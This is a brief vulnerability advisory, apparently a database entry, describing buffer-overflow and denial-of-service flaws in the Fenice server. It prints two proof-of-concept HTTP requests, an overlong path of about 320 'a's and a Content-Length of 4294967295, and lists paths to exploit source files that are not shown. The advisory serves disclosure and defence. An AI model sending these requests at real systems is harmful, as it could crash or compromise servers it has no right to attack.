Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities

Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities

The following HTTP request is sufficient to demonstrate the buffer-overflow vulnerability:
GET /[approximately 320 'a's] HTTP/1.0

The following HTTP request is sufficient to demonstrate the denial-of-service vulnerabilty:
GET / HTTP/1.0
Content-Length: 4294967295

The following exploit code is available:

/data/vulnerabilities/exploits/fenice.c
/data/vulnerabilities/exploits/FC_oneshot_exploit.c